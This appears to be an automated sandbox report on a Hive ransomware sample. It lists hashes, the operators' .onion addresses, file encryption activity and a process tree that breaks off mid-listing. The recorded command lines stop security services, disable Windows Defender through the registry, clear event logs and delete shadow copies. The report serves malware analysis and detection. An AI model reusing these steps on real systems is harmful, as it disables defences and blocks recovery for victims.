Analysis
-
max time kernel
112s -
max time network
30s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:19
Static task
static1
Behavioral task
behavioral1
Sample
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Resource
win10-en-20211208
General
-
Target
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
-
Size
2.7MB
-
MD5
fd7791be5fa43af1e9add98f15cf9c58
-
SHA1
78a7c5facdbbb0584033dd57b25c4df854c48eb7
-
SHA256
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826
-
SHA512
1020f1c311403020e7a604d69509c9ccd3d4c5fca4a643045241db52455eb8380d883c7f8e6e4b75ab32a252ed9fd5c90e0ab254f1836e4fdddb1622291b371a
Malware Config
Extracted
C:\Program Files\7-Zip\a84r_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2136 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2072 bcdedit.exe 2096 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exedescription ioc process File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\css\cpu.css edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_h2XRduMJEHk0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_SYnRodF6oxU0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_q0k5ccwighs0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files\7-Zip\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf__UGv6VXU7Jw0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsMacroTemplate.html.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_yf8Gc1oxFXk0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_xNik7wIYSho0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcfr.dll.mui edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_6dQvr2FzoO80.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_5AUbgd8mnUI0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_ON.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_oQNKzw5Yui80.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_R58mtL5QiHA0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_nSVIwQVXyMg0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_fBaCvmGKNRA0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf__TViLhMCpm00.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_lRk5sjDr_5c0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_q8aldPQ9F9A0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_i1hsMOxXSKw0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\DVD Maker\Shared\Filters.xml edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\settings.html edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Customer Support.fdt.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_IMdPfMuA04M0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AD98.POC.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_R8MVJBfq8n40.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_Ug9sPcfTjZ00.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\settings.js edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\BG_ADOBE.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_bx4lVuE4rxk0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\FLASH.NET.XML.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_oACvez9-yUM0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\IpsMigrationPlugin.dll.mui edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_v3dkwMQUMXI0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_Wfl-aWqDrks0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\OFFISUPP.HTM.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_PCr4rPxShNI0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_GqpgxIXy6mY0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_VelvetRose.gif.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_UNEs-Wvlhng0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_bGn438VOl500.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21329_.GIF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_JhQx89ed3f40.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_6cLwDlYDzU40.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files\7-Zip\Lang\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\a84r_HOW_TO_DECRYPT.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_qUMV_R_MYak0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLNOTE.FAE.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_ipx5qHOQf2E0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_-pZlrgBlovY0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_LvLLfbyacxk0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_f6mMd2r7Muc0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_51LXYBRS5-c0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_hBKKlYqmCiE0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif.fQVb-ykyPODJuNbMC4QyEQFDVMw1GZW8cTbql-qSXUf_OgCyD8zBOgU0.pruhs edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1532 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2620 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeedf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exepid process 2168 powershell.exe 2252 powershell.exe 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1696 wevtutil.exe Token: SeBackupPrivilege 1696 wevtutil.exe Token: SeSecurityPrivilege 1216 wevtutil.exe Token: SeBackupPrivilege 1216 wevtutil.exe Token: SeIncreaseQuotaPrivilege 748 wmic.exe Token: SeSecurityPrivilege 748 wmic.exe Token: SeTakeOwnershipPrivilege 748 wmic.exe Token: SeLoadDriverPrivilege 748 wmic.exe Token: SeSystemProfilePrivilege 748 wmic.exe Token: SeSystemtimePrivilege 748 wmic.exe Token: SeProfSingleProcessPrivilege 748 wmic.exe Token: SeIncBasePriorityPrivilege 748 wmic.exe Token: SeCreatePagefilePrivilege 748 wmic.exe Token: SeBackupPrivilege 748 wmic.exe Token: SeRestorePrivilege 748 wmic.exe Token: SeShutdownPrivilege 748 wmic.exe Token: SeDebugPrivilege 748 wmic.exe Token: SeSystemEnvironmentPrivilege 748 wmic.exe Token: SeRemoteShutdownPrivilege 748 wmic.exe Token: SeUndockPrivilege 748 wmic.exe Token: SeManageVolumePrivilege 748 wmic.exe Token: 33 748 wmic.exe Token: 34 748 wmic.exe Token: 35 748 wmic.exe Token: SeIncreaseQuotaPrivilege 968 wmic.exe Token: SeSecurityPrivilege 968 wmic.exe Token: SeTakeOwnershipPrivilege 968 wmic.exe Token: SeLoadDriverPrivilege 968 wmic.exe Token: SeSystemProfilePrivilege 968 wmic.exe Token: SeSystemtimePrivilege 968 wmic.exe Token: SeProfSingleProcessPrivilege 968 wmic.exe Token: SeIncBasePriorityPrivilege 968 wmic.exe Token: SeCreatePagefilePrivilege 968 wmic.exe Token: SeBackupPrivilege 968 wmic.exe Token: SeRestorePrivilege 968 wmic.exe Token: SeShutdownPrivilege 968 wmic.exe Token: SeDebugPrivilege 968 wmic.exe Token: SeSystemEnvironmentPrivilege 968 wmic.exe Token: SeRemoteShutdownPrivilege 968 wmic.exe Token: SeUndockPrivilege 968 wmic.exe Token: SeManageVolumePrivilege 968 wmic.exe Token: 33 968 wmic.exe Token: 34 968 wmic.exe Token: 35 968 wmic.exe Token: SeIncreaseQuotaPrivilege 968 wmic.exe Token: SeSecurityPrivilege 968 wmic.exe Token: SeTakeOwnershipPrivilege 968 wmic.exe Token: SeLoadDriverPrivilege 968 wmic.exe Token: SeSystemProfilePrivilege 968 wmic.exe Token: SeSystemtimePrivilege 968 wmic.exe Token: SeProfSingleProcessPrivilege 968 wmic.exe Token: SeIncBasePriorityPrivilege 968 wmic.exe Token: SeCreatePagefilePrivilege 968 wmic.exe Token: SeBackupPrivilege 968 wmic.exe Token: SeRestorePrivilege 968 wmic.exe Token: SeShutdownPrivilege 968 wmic.exe Token: SeDebugPrivilege 968 wmic.exe Token: SeSystemEnvironmentPrivilege 968 wmic.exe Token: SeRemoteShutdownPrivilege 968 wmic.exe Token: SeUndockPrivilege 968 wmic.exe Token: SeManageVolumePrivilege 968 wmic.exe Token: 33 968 wmic.exe Token: 34 968 wmic.exe Token: 35 968 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1580 wrote to memory of 960 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 960 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 960 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 960 wrote to memory of 268 960 net.exe net1.exe PID 960 wrote to memory of 268 960 net.exe net1.exe PID 960 wrote to memory of 268 960 net.exe net1.exe PID 1580 wrote to memory of 892 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 892 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 892 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 892 wrote to memory of 592 892 net.exe net1.exe PID 892 wrote to memory of 592 892 net.exe net1.exe PID 892 wrote to memory of 592 892 net.exe net1.exe PID 1580 wrote to memory of 1628 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1628 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1628 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1628 wrote to memory of 980 1628 net.exe net1.exe PID 1628 wrote to memory of 980 1628 net.exe net1.exe PID 1628 wrote to memory of 980 1628 net.exe net1.exe PID 1580 wrote to memory of 1900 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1900 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1900 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1900 wrote to memory of 836 1900 net.exe net1.exe PID 1900 wrote to memory of 836 1900 net.exe net1.exe PID 1900 wrote to memory of 836 1900 net.exe net1.exe PID 1580 wrote to memory of 1516 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1516 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1516 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1516 wrote to memory of 396 1516 net.exe net1.exe PID 1516 wrote to memory of 396 1516 net.exe net1.exe PID 1516 wrote to memory of 396 1516 net.exe net1.exe PID 1580 wrote to memory of 1736 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1736 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1736 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1736 wrote to memory of 968 1736 net.exe net1.exe PID 1736 wrote to memory of 968 1736 net.exe net1.exe PID 1736 wrote to memory of 968 1736 net.exe net1.exe PID 1580 wrote to memory of 1432 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1432 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1432 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1432 wrote to memory of 1440 1432 net.exe net1.exe PID 1432 wrote to memory of 1440 1432 net.exe net1.exe PID 1432 wrote to memory of 1440 1432 net.exe net1.exe PID 1580 wrote to memory of 1140 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1140 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1580 wrote to memory of 1140 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe net.exe PID 1140 wrote to memory of 1264 1140 net.exe net1.exe PID 1140 wrote to memory of 1264 1140 net.exe net1.exe PID 1140 wrote to memory of 1264 1140 net.exe net1.exe PID 1580 wrote to memory of 1100 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1100 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1100 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1340 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1340 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1340 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1812 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1812 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1812 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1984 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1984 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1984 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1856 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1856 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1856 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe PID 1580 wrote to memory of 1960 1580 edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe"C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:268
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
